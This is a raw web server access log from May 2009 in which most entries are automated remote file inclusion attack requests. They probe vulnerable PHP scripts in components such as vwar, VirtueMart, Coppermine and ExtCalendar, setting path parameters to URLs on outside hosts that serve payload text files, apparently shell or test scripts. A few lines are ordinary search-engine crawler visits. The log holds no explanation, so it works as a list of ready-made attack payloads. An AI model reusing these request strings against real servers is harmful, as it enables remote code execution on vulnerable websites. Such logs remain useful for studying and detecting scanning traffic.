200.142.148.142 - - [30/May/2009:09:02:18 -0500] "GET /logs/environment.php?DIR_PREFIX=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:09:02:19 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:09:02:19 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:09:02:19 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
74.52.2.130 - - [30/May/2009:09:02:24 -0500] "GET /logs//maillist/install/install3.php?database=none&cabsolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
74.52.2.130 - - [30/May/2009:09:02:24 -0500] "GET //maillist/install/install3.php?database=none&cabsolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
200.142.148.142 - - [30/May/2009:09:02:45 -0500] "GET /logs/access_log.1233878400/environment.php?DIR_PREFIX=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:09:02:46 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:09:02:46 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:09:02:46 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:09:02:46 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:09:02:46 -0500] "GET /logs/access_log.1242432000//include/mail.inc.php?skin_board_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.143.81.26 - - [30/May/2009:09:02:47 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
208.52.167.208 - - [30/May/2009:09:03:28 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.akahairywomen.com/amember/data/safe.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
208.52.167.208 - - [30/May/2009:09:03:28 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.akahairywomen.com/amember/data/safe.txt? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
91.121.137.51 - - [30/May/2009:09:04:18 -0500] "GET /logs/access_log.1239494400//vwar/convert/mvcw.php?step=http://www.maierarchitekten.de/manager/processors/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.121.137.51 - - [30/May/2009:09:04:18 -0500] "GET //vwar/convert/mvcw.php?step=http://www.maierarchitekten.de/manager/processors/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
91.121.137.51 - - [30/May/2009:09:04:18 -0500] "GET /logs//vwar/convert/mvcw.php?step=http://www.maierarchitekten.de/manager/processors/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:09:04:50 -0500] "GET /logs/access_log.1239062400/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:09:04:50 -0500] "GET /logs/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.17.162.28 - - [30/May/2009:09:04:51 -0500] "GET /include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.ngoiq.org/mag/themes/fisubice/log??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:09:04:56 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:09:04:56 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:09:04:57 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:09:05:05 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:09:05:14 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:09:05:14 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:09:05:14 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:09:05:14 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:09:05:38 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:09:05:38 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.234.100.126 - - [30/May/2009:09:05:43 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
210.48.158.168 - - [30/May/2009:09:05:50 -0500] "GET /logs//maillist/install/install3.php?database=none&cabsolute_path=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
210.48.158.168 - - [30/May/2009:09:05:51 -0500] "GET //maillist/install/install3.php?database=none&cabsolute_path=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
211.234.100.126 - - [30/May/2009:09:05:51 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.237.82.158 - - [30/May/2009:09:06:25 -0500] "GET //maillist/install/install3.php?database=none&cabsolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
69.237.82.158 - - [30/May/2009:09:06:25 -0500] "GET /logs/access_log.1233964800//maillist/install/install3.php?database=none&cabsolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
69.237.82.158 - - [30/May/2009:09:06:25 -0500] "GET /logs//maillist/install/install3.php?database=none&cabsolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.237.82.158 - - [30/May/2009:09:06:32 -0500] "GET /logs/access_log.1234051200//maillist/install/install3.php?database=none&cabsolute_path=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:07:54 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:07:54 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:07:54 -0500] "GET /logs/access_log.1235347200//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:08:00 -0500] "GET /logs/access_log.1231977600//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:08:03 -0500] "GET /logs/access_log.1232668800//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:08:07 -0500] "GET /logs/access_log.1227657600//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:08:08 -0500] "GET /logs/access_log.1231113600//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:08:13 -0500] "GET /logs/access_log.1234915200//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:08:19 -0500] "GET /logs/access_log.1236556800//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:09:08:22 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:09:08:22 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:09:08:22 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:08:23 -0500] "GET /logs/access_log.1228435200//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:08:23 -0500] "GET /logs/access_log.1228348800//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.239.76.25 - - [30/May/2009:09:08:28 -0500] "GET /logs/access_log.1232323200//config/dbutil.bck.php?confdir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:08:29 -0500] "GET /logs/access_log.1227744000//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:08:40 -0500] "GET /logs/access_log.1236038400//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:09:08:45 -0500] "GET /logs/access_log.1235433600//modules/vwar/admin/admin.php?vwar_root=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.246.20.221 - - [30/May/2009:09:09:19 -0500] "GET /logs/environment.php?DIR_PREFIX=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.246.20.221 - - [30/May/2009:09:09:19 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.246.20.221 - - [30/May/2009:09:09:58 -0500] "GET /logs/access_log.1233878400/environment.php?DIR_PREFIX=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.17.129.100 - - [30/May/2009:09:11:08 -0500] "GET /?sourcedir=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
84.17.129.100 - - [30/May/2009:09:11:08 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
84.17.129.100 - - [30/May/2009:09:11:09 -0500] "GET /logs/?sourcedir=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
84.17.129.100 - - [30/May/2009:09:11:26 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.232.145.41 - - [30/May/2009:09:14:05 -0500] "GET /logs/access_log.1233964800/environment.php?DIR_PREFIX=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.232.145.41 - - [30/May/2009:09:14:05 -0500] "GET /logs/environment.php?DIR_PREFIX=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
205.234.132.157 - - [30/May/2009:09:14:05 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
205.234.132.157 - - [30/May/2009:09:14:05 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
218.246.20.221 - - [30/May/2009:09:14:08 -0500] "GET /logs/access_log.1233705600/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.246.20.221 - - [30/May/2009:09:14:08 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
66.232.145.41 - - [30/May/2009:09:14:10 -0500] "GET /logs/access_log.1233878400/environment.php?DIR_PREFIX=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:09:14:20 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:09:14:20 -0500] "GET /logs/access_log.1228867200//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.130.29.11 - - [30/May/2009:09:14:20 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.pintoresenaccion.com/administrator/components/com_virtuemart/idfx1.TXT?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
70.32.106.32 - - [30/May/2009:09:15:23 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
70.32.106.32 - - [30/May/2009:09:15:23 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt%0D?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
218.27.203.107 - - [30/May/2009:09:15:26 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.bungeholes.com/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
218.27.203.107 - - [30/May/2009:09:15:27 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.bungeholes.com/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.246.20.221 - - [30/May/2009:09:15:32 -0500] "GET /logs/access_log.1236643200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.27.203.107 - - [30/May/2009:09:15:32 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://www.bungeholes.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:09:15:48 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:09:15:48 -0500] "GET /convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:09:15:48 -0500] "GET /logs/access_log.1232668800/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:09:15:48 -0500] "GET /logs/access_log.1236643200/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:09:15:58 -0500] "GET /logs/access_log.1235347200/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:09:16:07 -0500] "GET /convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:09:16:07 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:09:16:07 -0500] "GET /logs/access_log.1235865600/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:09:16:14 -0500] "GET /logs/access_log.1236643200/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.6.231.215 - - [30/May/2009:09:16:14 -0500] "GET /logs/access_log.1235347200/convert/mvcw.php?vwar_root=http://pdcmanagement.com///idfx1.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
218.27.203.107 - - [30/May/2009:09:16:55 -0500] "GET /logs/access_log.1235001600/includes/ktedit/toolbar.php?dirDepth=http://www.bungeholes.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.27.203.107 - - [30/May/2009:09:17:42 -0500] "GET /logs/access_log.1234483200/includes/ktedit/toolbar.php?dirDepth=http://www.bungeholes.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.147.29.190 - - [30/May/2009:09:19:33 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 314 "-""Mozilla/5.0"
217.147.29.190 - - [30/May/2009:09:19:33 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 309 "-""Mozilla/5.0"
217.147.29.190 - - [30/May/2009:09:19:34 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 336 "-""Mozilla/5.0"
203.251.225.77 - - [30/May/2009:09:19:52 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
203.251.225.77 - - [30/May/2009:09:19:52 -0500] "GET /logs/access_log.1237420800//modules/xfsection/modify.php?dir_module=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
203.251.225.77 - - [30/May/2009:09:19:52 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
203.251.225.77 - - [30/May/2009:09:19:52 -0500] "GET /logs/access_log.1237161600//modules/xfsection/modify.php?dir_module=http://www.mysticrystals.com/ccp5/media/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
217.147.29.190 - - [30/May/2009:09:20:21 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 336 "-""Mozilla/5.0"
89.6.145.13 - - [30/May/2009:09:20:46 -0500] "GET /logs/adxmlrpc.php HTTP/1.1" 404 300 "-""Mozilla/5.0"
89.6.145.13 - - [30/May/2009:09:20:46 -0500] "GET /adxmlrpc.php HTTP/1.1" 404 295 "-""Mozilla/5.0"
89.6.145.13 - - [30/May/2009:09:22:01 -0500] "GET /logs/xmlrpc.php HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.6.145.13 - - [30/May/2009:09:22:02 -0500] "GET /xmlrpc.php HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.55.106.220 - - [30/May/2009:09:26:23 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.234.201.88 - - [30/May/2009:09:26:31 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.808"
77.234.201.88 - - [30/May/2009:09:26:31 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.houserv.com//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
65.55.106.220 - - [30/May/2009:09:27:08 -0500] "GET /_vti_cnf/?S=A HTTP/1.1" 200 676 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.10.128.219 - - [30/May/2009:09:29:53 -0500] "GET /common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:09:29:53 -0500] "GET /logs/common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:09:29:53 -0500] "GET /logs/access_log.1238112000/common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:09:29:53 -0500] "GET /logs/access_log.1239494400/common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
70.32.106.32 - - [30/May/2009:09:30:39 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://neu_2.lasrv-1.de/web/.v6/id.txt%0D?? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
70.32.106.32 - - [30/May/2009:09:30:39 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://neu_2.lasrv-1.de/web/.v6/id.txt%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
116.36.213.166 - - [30/May/2009:09:31:26 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 309 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:09:31:27 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 314 "-""Mozilla/5.0"
205.234.132.157 - - [30/May/2009:09:31:32 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.810"
205.234.132.157 - - [30/May/2009:09:31:32 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
116.36.213.166 - - [30/May/2009:09:31:32 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 336 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:09:32:34 -0500] "GET /errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:09:32:34 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:09:32:34 -0500] "GET /logs/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:09:32:55 -0500] "GET //include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:09:32:55 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:09:32:55 -0500] "GET /logs/access_log.1242432000//include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:09:33:12 -0500] "GET /logs/access_log.1242172800//include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
83.103.72.130 - - [30/May/2009:09:34:04 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:09:35:13 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 309 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:09:35:13 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 314 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:09:35:13 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 336 "-""Mozilla/5.0"
116.36.213.166 - - [30/May/2009:09:36:11 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.212.14.88 - - [30/May/2009:09:36:38 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
67.212.14.88 - - [30/May/2009:09:36:38 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.803"
65.55.208.130 - - [30/May/2009:09:40:45 -0500] "GET /?S=D HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
208.80.195.38 - - [30/May/2009:09:41:22 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MSN 9.0;MSN 9.1; MSNbVZ02; MSNmen-us; MSNcOTH; MPLUS)"
216.17.99.13 - - [30/May/2009:09:44:23 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://jasek1.fileave.com/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
